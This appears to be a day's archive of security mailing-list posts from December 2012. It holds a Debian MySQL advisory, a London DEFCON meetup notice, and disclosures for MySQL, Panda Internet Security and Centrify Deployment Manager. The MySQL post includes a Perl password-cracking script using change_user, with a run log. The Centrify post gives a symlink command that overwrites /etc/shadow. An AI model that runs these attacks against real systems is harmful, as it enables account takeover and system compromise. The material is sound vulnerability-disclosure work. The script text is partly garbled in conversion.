[SECURITY] [DSA 2581-1] mysql-5.1 security update

2012-12-04 Thread Yves-Alexis Perez 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

- -
Debian Security Advisory DSA-2581-1   secur...@debian.org
http://www.debian.org/security/ Yves-Alexis Perez
December 04, 2012  http://www.debian.org/security/faq
- -

Package: mysql-5.1
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2012-3150 CVE-2012-3158 CVE-2012-3160 CVE-2012-3163 
 CVE-2012-3166 CVE-2012-3167 CVE-2012-3173 CVE-2012-3177
 CVE-2012-3180 CVE-2012-3197 CVE-2012-5611
Debian Bug : 690778 695001

Several issues have been discovered in the MySQL database server. The
vulnerabilities are addressed by upgrading MySQL to a new upstream version,
5.1.66, which includes additional changes, such as performance improvements and
corrections for data loss defects.  These changes are described in the MySQL
release notes at: http://dev.mysql.com/doc/refman/5.1/en/news-5-1-66.html

For the testing distribution (wheezy) and unstable distribution (sid), these
problems have been fixed in version 5.5.28+dfsg-1.

Additionally, CVE-2012-5611 has been fixed in this upload. The vulnerability
(discovered independently by Tomas Hoger from the Red Hat Security Response
Team and king cope) is a stack-based buffer overflow in acl_get() when
checking user access to a database. Using a carefully crafted database name, an
already authenticated MySQL user could make the server crash or even execute
arbitrary code as the mysql system user.

For the stable distribution (squeeze), this problem has been fixed in version
5.1.66-0+squeeze1.

For the testing distribution (wheezy) and unstable distribution (sid), this
problem will be fixed soon.

We recommend that you upgrade your mysql-5.1 packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v2.0.19 (GNU/Linux)

iQEcBAEBCgAGBQJQvZ/WAAoJEG3bU/KmdcClarEIAJ9nKbUELxjb1eksmEGOXkYr
x2WM+6XPVAN+4JKwwFyXCNYJbTPG5J3EM090YguqfnoWvVHZaPbcciymDOyNwPh3
x9Dm7lBNla2/fPvgEsA8enGaQdIrHnOy13Lj4e4Mu/3g1nSBp0eGZIVT6TVy9BJO
Hiqds0BZDqHuG/SGtWNsMLs6dMH4iYVcvcK3NFyFh6zt8O73Cbe0xIYDDuwO0uwj
HoUk6WxK2qs7auir+XkAShdQAj7KjL7Zs3LmLPaH1oUKvRD/IYJw14NRkdeU8CC5
Jz9sdTICSYxYe11zITXYdF4UYRLpF7W8jW6WDPM5kkZWPTjtUkUB0jcdeFQP6v4=
=D3mt
-END PGP SIGNATURE-

DC4420 - London DEFCON - Christmas 2012 meet! Tuesday 11th December 2012

2012-12-04 Thread Major Malfunction 

Hard to believe, but 2012 is almost over

Once again we've managed to secure the venue for a December meet, so we 
can start the festivities well before your livers are too crippled by 
office parties... Not only that, but we've even got a speaker lined up!


Chris from Facebook London's Site Integrity Engineering Team will be 
giving us:


Why root the kernel when you can just install a toolbar?

Chris will give a brief overview of the major attacks against Facebook 
and then deep dive on a trend towards browser malware that they really 
saw gain traction last year.


... and then we'll do some serious Christmas drinking!

DOWNSTAIRS @ The Phoenix, Cavendish Square

  http://www.phoenixcavendishsquare.co.uk/

Talk starts at 19:30, but the venue is ours from much earlier... food is 
good and beer is cold!


See you next week!

cheers,
MM

p.s. if you have any potential talks for next year please email:

mailto:ta...@dc4420.org?subject=DC4420%20Talk
--
In DEFCON, we have no names... errr... well, we do... but silly ones...

MySQL Local/Remote FAST Account Password Cracking

2012-12-04 Thread king cope 
FAST Cracking of MySQL account passwords locally or over the network (post-auth)

(to the maintainers: you don't need to patch this, looks alot like a
minor bug, prolly documented :D)

I found a method to crack mysql user passwords locally or over the
network pretty efficiently.
During Tests it was possible to test 5000 passwords per second over the network.
The method is as follows:

The attacker logs into the mysql server with an unprivileged account.
There is a command in mysql called change_user, this command can be used
as the name suggests to change a user during a mysql session.
Since mysql is very fast in doing this it is much more powerful to crack
passwords rather than reconnecting every time to the mysql server to
brute force passwords
(what would be VERY slow).
Since the SALT does not change (and this is the weak point) in the
change_user command
it is a convienent way to crack passwords. (When connecting to mysql
in each connection
attempt the SALT is always different and sent out by the server).

Below is an example script and an example which uses John the Ripper's
capabilities
to generate passwords.

The passwords pass for the user crackme is cracked in a matter of seconds.
(about 10 passwords are tested in 20 seconds)
---
cracking script

use Net::MySQL;

$|=1;

my $mysql = Net::MySQL-new(
 hostname = '192.168.2.3',
 database = 'test',
 user = user,
 password = secret,
 debug = 0,
);

$crackuser = crackme;

while(stdin) {
chomp;
$currentpass = $_;

$vv = join \0,
$crackuser,
\x14.
Net::MySQL::Password-scramble(
$currentpass, $mysql-{salt}, 
$mysql-{client_capabilities}
) . \0;
if ($mysql-_execute_command(\x11, $vv) ne undef) {
print [*] Cracked! -- $currentpass\n;
exit;
}
}
---
example session:

C:\Users\kingcope\DesktopC:\Users\kingcope\Desktop\john179\run\jo
hn --incremental --stdout=5 | perl mysqlcrack.pl
Warning: MaxLen = 8 is too large for the current hash type, reduced to 5
words: 16382  time: 0:00:00:02  w/s: 6262  current: citcH
words: 24573  time: 0:00:00:04  w/s: 4916  current: rap
words: 40956  time: 0:00:00:07  w/s: 5498  current: matc3
words: 49147  time: 0:00:00:09  w/s: 5030  current: 4429
words: 65530  time: 0:00:00:12  w/s: 5354  current: ch141
words: 73721  time: 0:00:00:14  w/s: 5021  current: v3n
words: 90104  time: 0:00:00:17  w/s: 5277  current: pun2
[*] Cracked! -- pass
words: 98295  time: 0:00:00:18  w/s: 5434  current: 43gs
Session aborted

Greetings,

Kingcope

Privilege Escalation through Binary Planting in Panda Internet Security

2012-12-04 Thread by_argos 

Privilege Escalation through Binary Planting in Panda Internet Security


Software: Panda Internet Security 2012  2013
Vendor: http://www.pandasecurity.com/
Vuln Type: Binary Planting Attack
Remote: No
Local: Yes
Discovered by: QSecure and Demetris Papapetrou
Website: http://www.qsecure.com.cy
Discovered: 09/09/2012
Reported: 19/11/2012
Disclosed: 04/12/2012
Vendor's Response: Automatically Generated Email
Vulnerability Reference: 
http://www.qsecure.com.cy/advisories/binary_planting_in_panda.html

VULNERABILITY DESCRIPTION:
==
As a result of an incorrect dynamic link library (DLL) loading in Panda 
Internet Security, an attacker with user level access to the machine can 
elevate 

his/her privileges to SYSTEM.

This can be accomplished by planting a malicious DLL file in a writable folder 
that is part of the system's %PATH% variable. The malicious DLL is loaded when 

the vulnerable Panda service or the system is restarted.

The following DLLs are insecurely loaded by Panda Internet Security 2013:

Insecure DLLVulnerable Service
-   --
Pavshld.dll PsCtrls.exe, PsImSvc.exe, PavFnSvr.exe, PskSvc.exe
ImFilter.dll2   PsImSvc.exe
ImFilter.dll3   PsImSvc.exe
ImFilter.dll4   PsImSvc.exe

In addition to the above DLLs, Panda Internet Security 2012 also loads ham.dll 
insecurely.

Centrify Deployment Manager v2.1.0.283

2012-12-04 Thread larry0 
Centrify Deployment Manager v2.1.0.283

While at a training session for centrify, I noticed poor handling of files in 
/tmp. I was able to overwrite /etc/shadow with the contents of adcheckDMoutput.

I am sure there are more vulnerabilities to be exploit, maybe a local root - 
but being this is a training class I should probably focus.

total 6680
-rwxr-xr-x 1 clyde clyde 6790300 Dec 3 14:41 adcheck-rhel3-i386.210

-rw-rw-r-- 1 clyde clyde 188 Dec  3 14:41 centrify.cmd.210
-rwxr-xr-x 1 root  root  187 Dec  3 14:18 engnew-cen.sh
drwx-- 2 root  root 4096 Dec  3 10:25 vmware-root
drwxr-xr-x 7 root  root 4096 Nov 30  2010 vmware-tools-distrib

[root@engnew-cen tmp]# ls -l
total 6680

-rw-rw-rw- 1 root  root 3999 Dec  3 14:41 adcheckDMoutput
-rwxr-xr-x 1 clyde clyde 6790300 Dec  3 14:41 adcheck-rhel3-i386.210
-rwxr-xr-x 1 root  root  187 Dec  3 14:18 engnew-cen.sh
drwx-- 2 root  root 4096 Dec  3 10:25 vmware-root
drwxr-xr-x 7 root  root 4096 Nov 30  2010 vmware-tools-distrib

[root@engnew-cen tmp]# ls -l
total 6688

-rw-rw-rw- 1 root  root 3999 Dec  3 14:41 adcheckDMoutput 
-rwxr-xr-x 1 clyde clyde 6790300 Dec  3 14:41 adcheck-rhel3-i386.210
-rwxr-xr-x 1 clyde clyde 132 Dec  3 14:41 centrify.cmd.210
-rwxr-xr-x 1 root  root  187 Dec  3 14:18 engnew-cen.sh
drwx-- 2 root  root 4096 Dec  3 10:25 vmware-root
drwxr-xr-x 7 root  root 4096 Nov 30  2010 vmware-tools-distrib

[root@engnew-cen tmp]# ls -l
total 6672
-rwxr-xr-x 1 clyde clyde 6790300 Dec 3 14:41 adcheck-rhel3-i386.210 -rwxr-xr-x 
1 root root 187 Dec 3 14:18 engnew-cen.sh

# ln -s /etc/shadow adcheckDMoutput

After run:

# ls -l /etc/shadow
-r 1 root root 3999 Dec 3 14:56 /etc/shadow

/etc/shadow has been overwritten with the contents of adcheckDMoutput.

I am also assuming the .210 appended to the end of files in /tmp is the major 
version number.

Larry W. Cashdollar
@_larry0

Centrify Deployment Manager v2.1.0.283

2012-12-04 Thread larry0 
This is actually the login UID of the user Deployment manager is being run as.

Centrify Deployment Manager v2.1.0.283